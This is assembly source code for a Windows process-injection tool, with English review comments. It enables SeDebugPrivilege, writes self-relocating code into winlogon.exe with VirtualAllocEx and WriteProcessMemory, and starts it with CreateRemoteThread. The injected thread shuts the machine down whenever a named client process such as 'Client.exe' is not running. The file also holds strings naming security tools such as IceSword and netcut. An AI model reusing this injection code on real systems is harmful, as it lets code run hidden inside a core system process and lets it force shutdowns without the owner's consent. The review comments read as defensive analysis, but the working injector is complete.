;Click the Build menu above: compile first, then build. Since there is only one process I did not bother writing an INI; just change the process name a little further below.
;The place to change is a little further down; if you simply open this in RadASM you will see that line highlighted in yellow.
;http://www.pediy.com/tools/Compilers.htm
;Download the build tool from the URL above (RadASM 2.2.1.2). Do not create a project; just create a new ASM file.
;______________________________________________________
; Target: 32-bit x86 (.386), flat memory model, STDCALL calling convention
; (callee pops its arguments) -- the ABI every Win32 call below relies on.
.386
.model flat, stdcall
; Symbols are case-sensitive so the imported API names match exactly.
option casemap :none
;______________________________________________________
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include advapi32.inc
includelib advapi32.lib
;______________________________________________________
; Forward declarations so `invoke` can check the argument counts at the
; call sites in `start`; both procedures are defined later in the file.
_EnablePrivilege proto :DWORD,:DWORD
_GetPidFromProcName proto :DWORD
; Injector-side (local process) state, uninitialised.
.data?
; The three kernel32 entry points resolved in `start`.  Their order must
; match the first three dwords at REMOTE_CODE_START: `start` copies exactly
; `sizeof dword * 3` bytes starting at lpLoadLibrary into the remote buffer.
lpLoadLibrary dd ?
lpGetProcAddress dd ?
lpGetModuleHandle dd ?
dwProcessID dd ?                 ; not referenced by the visible code
dwThreadID dd ?                  ; not referenced by the visible code
hProcess dd ?                    ; target process handle from OpenProcess
lpRemoteCode dd ?                ; remote buffer returned by VirtualAllocEx
; Read-only constants for the injector.
.const
szSeDebugPrivilege db 'SeDebugPrivilege',0   ; enabled before OpenProcess
; Name of the process the code is written into.  The commented-out line is
; a benign test target; the live line names winlogon.exe, a Windows system
; process -- a remote thread appearing in it is a strong detection signal.
;szwinlogon db 'notepad.exe',0
szwinlogon db 'winlogon.exe',0
; Message shown when OpenProcess fails.  The bytes are mis-encoded in this
; copy of the file, but they are runtime data and are left as found.
szErrOpen db '無法打開遠(yuǎn)程線程!',0
; Module and export names looked up in `start`.
szDllKernel db 'Kernel32.dll',0
szLoadLibrary db 'LoadLibraryA',0
szGetProcAddress db 'GetProcAddress',0
szGetModuleHandle db 'GetModuleHandleA',0
;______________________________________________________
;-----------------------------------------------------------------------
; reverseArgs arglist
; Compile-time helper: expands to the same arguments in reverse order
; (e.g. <a,b,c> -> c,b,a).  Used by _invoke so that the arguments are
; pushed right-to-left as STDCALL requires.
;-----------------------------------------------------------------------
reverseArgs macro arglist:VARARG
local txt,count
txt TEXTEQU <>
count = 0
; Prepend each argument plus a comma to the accumulated text.
for i,<arglist>
count = count + 1
txt TEXTEQU @CatStr(i,<!,>,<%txt>)
endm
; Drop the trailing comma left by the last prepend (non-empty list only).
if count GT 0
txt SUBSTR txt,1,@SizeStr(%txt)-1
endif
exitm txt
endm
;______________________________________________________
;-----------------------------------------------------------------------
; _invoke _Proc, args...
; Indirect STDCALL call through a function pointer held in memory (e.g.
; `[ebx + _lpSleep]` in the injected code, where `invoke` cannot be used
; because the address is only known at run time).  Pushes the arguments
; right-to-left and calls through the pointer; the callee pops them.
; Unlike `invoke` there is no argument-count or type checking.
; `count` is computed but not used.
;-----------------------------------------------------------------------
_invoke macro _Proc,args:VARARG
local count
count = 0
% for i,< reverseArgs( args ) >
count = count + 1
push i
endm
call dword ptr _Proc
endm
;______________________________________________________
.code
;______________________________________________________
; Injected image.  Everything from REMOTE_CODE_START to REMOTE_CODE_END
; (these tables, the strings, and the three procs that follow) is copied
; as one blob into the target process, so it must be position-independent:
; each proc computes a delta in ebx and addresses everything as
; [ebx + offset X].  The data sits in .code because the blob is copied
; from here; the target page is allocated PAGE_EXECUTE_READWRITE in `start`.
REMOTE_CODE_START equ this byte
; Filled in by the injector's second WriteProcessMemory (3 dwords, same
; order as lpLoadLibrary/lpGetProcAddress/lpGetModuleHandle in .data?).
; _lpLoadLibrary is not referenced by the remote code.
_lpLoadLibrary dd ?
_lpGetProcAddress dd ?
_lpGetModuleHandle dd ?
;______________________________________________________
;user32.dll
;______________________________________________________
; Pointer tables, filled at run time by _RemoteThread.  Slot order in each
; table must match the order of the name list for the same DLL below.
; The user32 slots are resolved but none of them is used by the visible code.
_lpDestroyWindow dd ?
_lpPostQuitMessage dd ?
_lpDefWindowProc dd ?
_lpLoadCursor dd ?
_lpRegisterClassEx dd ?
_lpCreateWindowEx dd ?
_lpFindWindowA dd ?
_lpPostMessageA dd ?
_lpShowWindow dd ?
_lpUpdateWindow dd ?
_lpGetMessage dd ?
_lpTranslateMessage dd ?
_lpDispatchMessage dd ?
_lpSetTimer dd ?
_lpMessageBoxA dd ?
;______________________________________________________
;kernel32.dll
;______________________________________________________
; Used by _Process / _RemoteThread: CreateToolhelp32Snapshot, Process32First,
; lstrcmp, Sleep, Process32Next, CloseHandle.  OpenProcess and
; TerminateProcess are resolved but not referenced by the visible code.
_lpCreateToolhelp32Snapshot dd ?
_lpProcess32First dd ?
_lplstrcmp dd ?
_lpSleep dd ?
_lpOpenProcess dd ?
_lpTerminateProcess dd ?
_lpProcess32Next dd ?
_lpCloseHandle dd ?
;______________________________________________________
;ntdll.dll
;______________________________________________________
; Both used by _Shutdown.
_lpRtlAdjustPrivilege dd ?
_lpNtShutdownSystem dd ?
;______________________________________________________
; Scratch storage for the remote procs.  Only _hSnapShot is referenced by
; the visible code; _Process uses its own local PROCESSENTRY32.
_hProcess dd ?
_hSnapShot dd ?
_hInstance dd ?
_hWinMain dd ?
_stProcess PROCESSENTRY32 <?>
_scCmd db 'Client.exe',0 ;process name the watchdog looks for (compared with lstrcmpA in _Process); the original note says to change this to the billing system's process name
; Module names passed to GetModuleHandleA by _RemoteThread.
_szDllUser db 'User32.dll',0
_szDllUserkernel32 db 'kernel32.dll',0
_szDllNtdll db 'ntdll.dll',0
;______________________________________________________
;kernel32.dll
;______________________________________________________
; Export-name list for the kernel32 table above, one 0-terminated name
; per slot.  The extra 0 after the last name is intended as the
; end-of-list marker for the resolver loop in _RemoteThread.
_szCreateToolhelp32Snapshot db 'CreateToolhelp32Snapshot',0
_szProcess32First db 'Process32First',0
_szlstrcmp db 'lstrcmpA',0
_szSleep db 'Sleep',0
_szOpenProcess db 'OpenProcess',0
_szTerminateProcess db 'TerminateProcess',0
_szProcess32Next db 'Process32Next',0
_szCloseHandle db 'CloseHandle',0,0
;______________________________________________________
; Leftover string constants -- none is referenced by the visible code.
; Note _SuperLANadmin has no terminating 0 and runs into _Robocop.
_szText db 'Mr.Fox',0
_szClassName db 'RemoteClass',0
_szCaptionMain db 'RemoteWindow',0
_szNotepad db 'notepad',0
_szQQ db '444705607_QQMusic_SmallClient',0
_system32 db 'system32',0
_command db 'command$ 在 WXNT.CN (192.168.0.253) 上',0
_IceSword db 'IceSword.exe',0
_P2pover db 'p2pover.exe',0
_Netrobocop db 'Netrobocop.exe',0
_SuperLANadmin db 'SuperLANadmin.exe'
_Robocop db 'Robocop.exe',0
_Netsense db 'Netsense.exe',0
_Netcut db 'netcut.exe',0
;______________________________________________________
;user32.dll
;______________________________________________________
; Export-name list for the user32 table above (same layout rules).
_szDestroyWindow db 'DestroyWindow',0
_szPostQuitMessage db 'PostQuitMessage',0
_szDefWindowProc db 'DefWindowProcA',0
_szLoadCursor db 'LoadCursorA',0
_szRegisterClassEx db 'RegisterClassExA',0
_szCreateWindowEx db 'CreateWindowExA',0
_szFindWindowA db 'FindWindowA',0
_szPostMessageA db 'PostMessageA',0
_szShowWindow db 'ShowWindow',0
_szUpdateWindow db 'UpdateWindow',0
_szGetMessage db 'GetMessageA',0
_szTranslateMessage db 'TranslateMessage',0
_szDispatchMessage db 'DispatchMessageA',0
_szSetTimer db 'SetTimer',0
_szMessageBoxA db 'MessageBoxA',0,0
;______________________________________________________
;ntdll.dll
;______________________________________________________
; Export-name list for the ntdll table above (same layout rules).
_szRtlAdjustPrivilege db 'RtlAdjustPrivilege',0
_szNtShutdownSystem db 'NtShutdownSystem',0,0
;______________________________________________________
;-----------------------------------------------------------------------
; _RemoteThread(lParam) -- thread start routine executed inside the target
; process (its address is passed to CreateRemoteThread in `start`).
; Precondition: the injector has already overwritten the first three dwords
; at REMOTE_CODE_START with the kernel32 entry points.
; Behaviour: resolves the user32, kernel32 and ntdll pointer tables by name,
; then loops forever calling _Process once a second.  Never returns normally.
; Registers: ebx = relocation delta (run-time address minus link-time
; address); esi walks a name list; edi walks the matching pointer table.
; `uses ebx edi esi` saves and restores them; lParam is unused.
;-----------------------------------------------------------------------
_RemoteThread proc uses ebx edi esi lParam
local @sc                        ; module handle of the DLL being resolved
; Self-relocation: `call` pushes the real address of @@; subtracting its
; link-time offset leaves the delta in ebx, so every `[ebx + offset X]`
; below addresses X inside the remote buffer.
call @F
@@:
pop ebx
sub ebx,offset @B
;______________________________________________________
;user32.dll
lea eax,[ebx + offset _szDllUser]
_invoke [ebx + _lpGetModuleHandle],eax
mov @sc,eax
lea esi,[ebx + offset _szDestroyWindow]   ; first name of the list
lea edi,[ebx + offset _lpDestroyWindow]   ; first slot of the table
; Resolve one export per iteration: GetProcAddress(@sc, esi) -> [edi],
; then the lodsb loop advances esi to the byte after the name's terminator.
.while TRUE
_invoke [ebx + _lpGetProcAddress],@sc,esi
mov [edi],eax
add edi,4
@@:
lodsb
or al,al
jnz @B
; End-of-list test.  NOTE(review): lodsb has already moved esi past the
; terminating 0 when this runs, so the test reads one byte beyond the
; `,0,0` sentinel that ends each name list -- whether the loop stops where
; intended is to be confirmed.  The kernel32 and ntdll loops below share
; this pattern.
.break .if ! byte ptr [esi + 1]
.endw
;______________________________________________________
;kernel32.dll
lea eax,[ebx + offset _szDllUserkernel32]
_invoke [ebx + _lpGetModuleHandle],eax
mov @sc,eax
lea esi,[ebx + offset _szCreateToolhelp32Snapshot]
lea edi,[ebx + offset _lpCreateToolhelp32Snapshot]
; Same resolver loop as for user32.
.while TRUE
_invoke [ebx + _lpGetProcAddress],@sc,esi
mov [edi],eax
add edi,4
@@:
lodsb
or al,al
jnz @B
.break .if ! byte ptr [esi + 1]
.endw
;______________________________________________________
;ntdll.dll
lea eax,[ebx + offset _szDllNtdll]
_invoke [ebx + _lpGetModuleHandle],eax
mov @sc,eax
lea esi,[ebx + offset _szRtlAdjustPrivilege]
lea edi,[ebx + offset _lpRtlAdjustPrivilege]
; Same resolver loop as for user32.
.while TRUE
_invoke [ebx + _lpGetProcAddress],@sc,esi
mov [edi],eax
add edi,4
@@:
lodsb
or al,al
jnz @B
.break .if ! byte ptr [esi + 1]
.endw
;______________________________________________________
; Watchdog: poll once a second.  _Process recomputes the same delta into
; ebx, so its clobbering ebx/esi does not disturb this loop.
.while TRUE
_invoke [ebx + _lpSleep],1000
call _Process
.endw
ret                              ; unreachable: the loop above never exits
_RemoteThread endp
;______________________________________________________
;-----------------------------------------------------------------------
; _Process -- one poll of the watchdog (called from _RemoteThread).
; Takes a Toolhelp process snapshot and compares each entry's szExeFile
; against the name at _scCmd using lstrcmpA (case-sensitive, unlike the
; lstrcmpi used by the injector's own _GetPidFromProcName).  If no entry
; matches, calls _Shutdown.  No arguments; no meaningful return value.
; Registers: ebx = relocation delta; esi = "found" flag (TRUE/FALSE).
; No `uses` list -- relies on the caller's `uses ebx edi esi`.
;-----------------------------------------------------------------------
_Process proc
local @stProcess:PROCESSENTRY32
local @scCmd                     ; run-time address of _scCmd
local @ExeFile                   ; address of @stProcess.szExeFile
; Same self-relocation idiom as _RemoteThread.
call @F
@@:
pop ebx
sub ebx,offset @B
;______________________________________________________
_invoke [ebx + _lpCreateToolhelp32Snapshot],TH32CS_SNAPPROCESS,0
mov [ebx + _hSnapShot],eax       ; not checked for INVALID_HANDLE_VALUE
mov @stProcess.dwSize,sizeof @stProcess
lea eax,@stProcess
_invoke [ebx + _lpProcess32First],[ebx + _hSnapShot],eax
; NOTE(review): esi is only assigned inside the loop body; if Process32First
; returns 0 the `.if esi != TRUE` test below sees esi as left by the caller.
.while eax != 0
mov esi,FALSE
lea eax,@stProcess.szExeFile
mov @ExeFile,eax
lea eax,[ebx + offset _scCmd]
mov @scCmd,eax
_invoke [ebx + _lplstrcmp],@scCmd,@ExeFile
.if eax == 0
mov esi,TRUE                     ; watched process is running
.break
.endif
lea eax,@stProcess
_invoke [ebx + _lpProcess32Next],[ebx + _hSnapShot],eax
.endw
_invoke [ebx + _lpCloseHandle],[ebx + _hSnapShot]
; Watched process absent -> shut the machine down.
.if esi != TRUE
call _Shutdown
.endif
mov esi,FALSE
ret
_Process endp
;______________________________________________________
;-----------------------------------------------------------------------
; _Shutdown -- called by _Process when the watched process is missing.
; Enables the shutdown privilege through ntdll!RtlAdjustPrivilege, then
; calls NtShutdownSystem.  Clobbers ebx.
; NOTE(review): there is no `ret`.  If NtShutdownSystem returns (for
; instance because the privilege could not be enabled), execution falls
; off the end of the procedure into whatever lies beyond the copied bytes.
;-----------------------------------------------------------------------
_Shutdown Proc
; Same self-relocation idiom as _RemoteThread.
call @F
@@:
pop ebx
sub ebx,offset @B
;______________________________________________________
; RtlAdjustPrivilege(Privilege = 13h (SE_SHUTDOWN_PRIVILEGE), Enable = 1,
; CurrentThread = 0, Enabled = esp).  The last argument is a pointer to an
; output BOOLEAN; esp is pushed as that pointer, so the callee writes the
; previous state into the stack slot esp addressed at push time -- TODO
; confirm which slot that is; it is not a dedicated local.
_invoke [ebx + _lpRtlAdjustPrivilege],13h,1h,0h,esp
; NtShutdownSystem(0): action 0 is ShutdownNoReboot.  Does not return on success.
_invoke [ebx + _lpNtShutdownSystem],0
_Shutdown endp
;*******************************************************************
; End marker of the injected image; REMOTE_CODE_LENGTH is the byte count
; that `start` allocates in and copies into the target process.
REMOTE_CODE_END equ this byte
REMOTE_CODE_LENGTH equ offset REMOTE_CODE_END - offset REMOTE_CODE_START
;______________________________________________________
;-----------------------------------------------------------------------
; start -- injector entry point (runs in the local process).
; 1. Resolve LoadLibraryA / GetProcAddress / GetModuleHandleA from
;    kernel32; these addresses are copied into the remote buffer.
; 2. Enable SeDebugPrivilege, locate the target process by name and open
;    it with PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE.
; 3. Allocate an RWX buffer in the target, copy REMOTE_CODE_START..END plus
;    the three pointers into it, and start _RemoteThread there.
; Steps 2-3 (OpenProcess on a system process, PAGE_EXECUTE_READWRITE
; VirtualAllocEx, WriteProcessMemory, CreateRemoteThread) form the classic
; remote-thread injection sequence that endpoint telemetry keys on.
; The results of WriteProcessMemory and CreateRemoteThread are not checked.
;-----------------------------------------------------------------------
start:
invoke GetModuleHandle,addr szDllKernel
mov ebx,eax                      ; ebx = hKernel32
invoke GetProcAddress,ebx,offset szLoadLibrary
mov lpLoadLibrary,eax            ; copied to the target but never used there
invoke GetProcAddress,ebx,offset szGetProcAddress
mov lpGetProcAddress,eax
invoke GetProcAddress,ebx,offset szGetModuleHandle
mov lpGetModuleHandle,eax
;______________________________________________________
invoke _EnablePrivilege,offset szSeDebugPrivilege, TRUE
invoke _GetPidFromProcName,offset szwinlogon
; eax = PID (0 if not found); OpenProcess's own failure is what is checked.
invoke OpenProcess, PROCESS_CREATE_THREAD+PROCESS_VM_OPERATION+PROCESS_VM_WRITE, FALSE, eax
.if eax
mov hProcess,eax
invoke VirtualAllocEx,hProcess,NULL,REMOTE_CODE_LENGTH,MEM_COMMIT,PAGE_EXECUTE_READWRITE
.if eax
mov lpRemoteCode,eax
; Copy the whole image, then patch its first three dwords with the resolved
; kernel32 addresses (same order as _lpLoadLibrary.. at REMOTE_CODE_START).
invoke WriteProcessMemory,hProcess,lpRemoteCode,\
offset REMOTE_CODE_START,REMOTE_CODE_LENGTH,NULL
invoke WriteProcessMemory,hProcess,lpRemoteCode,\
offset lpLoadLibrary,sizeof dword * 3,NULL
; Thread start address = remote base + offset of _RemoteThread in the image.
mov eax,lpRemoteCode
add eax,offset _RemoteThread - offset REMOTE_CODE_START
invoke CreateRemoteThread,hProcess,NULL,0,eax,0,0,NULL
invoke CloseHandle,eax           ; thread handle (NULL if the call failed)
.endif
invoke CloseHandle,hProcess
.else
invoke MessageBox,NULL,addr szErrOpen,NULL,MB_OK or MB_ICONWARNING
.endif
invoke ExitProcess,NULL
;______________________________________________________
;-----------------------------------------------------------------------
; BOOL _EnablePrivilege(LPCSTR szPriv, BOOL bFlags)
; Enables (bFlags != 0) or disables (bFlags == 0) the named privilege in
; the current process token.
; Returns AdjustTokenPrivileges' BOOL in eax.  That API returns TRUE even
; when the token does not hold the privilege (it then reports
; ERROR_NOT_ALL_ASSIGNED), so TRUE does not prove the privilege was granted.
; The OpenProcessToken and LookupPrivilegeValue results are not checked.
;-----------------------------------------------------------------------
_EnablePrivilege proc szPriv:DWORD, bFlags:DWORD
local hToken
local tkp : TOKEN_PRIVILEGES
invoke GetCurrentProcess
mov edx,eax
invoke OpenProcessToken,edx,TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY,addr hToken
invoke LookupPrivilegeValue,NULL,szPriv,addr tkp.Privileges.Luid
mov tkp.PrivilegeCount, 1
; Attributes = SE_PRIVILEGE_ENABLED when enabling, 0 when disabling.
xor eax,eax
.if bFlags
mov eax,SE_PRIVILEGE_ENABLED
.endif
mov tkp.Privileges.Attributes, eax
invoke AdjustTokenPrivileges, hToken, FALSE, addr tkp, 0, 0, 0
push eax                         ; keep the result across CloseHandle
invoke CloseHandle, hToken
pop eax
ret
_EnablePrivilege endp
;_____________________________________________________________
;-----------------------------------------------------------------------
; DWORD _GetPidFromProcName(LPCSTR lpProcName)
; Walks a Toolhelp process snapshot and returns the th32ProcessID of the
; first entry whose szExeFile matches lpProcName case-insensitively
; (lstrcmpi), or 0 if no entry matches.
; The snapshot handle is used without checking for INVALID_HANDLE_VALUE.
;-----------------------------------------------------------------------
_GetPidFromProcName proc lpProcName:DWORD
local stProcess : PROCESSENTRY32
local hSnapshot
local @dwProcessID               ; result; stays 0 when nothing matches
mov @dwProcessID, 0
invoke RtlZeroMemory, addr stProcess, sizeof stProcess
mov stProcess.dwSize, sizeof stProcess
invoke CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS, 0
mov hSnapshot, eax
invoke Process32First, hSnapshot, addr stProcess
.while eax
invoke lstrcmpi, lpProcName, addr stProcess.szExeFile
.if eax==0
mov eax, stProcess.th32ProcessID
mov @dwProcessID, eax
.break                           ; first match wins
.endif
invoke Process32Next, hSnapshot, addr stProcess
.endw
invoke CloseHandle, hSnapshot
mov eax, @dwProcessID
ret
_GetPidFromProcName endp
;_______________________________________________________
end start
;______________________________________________________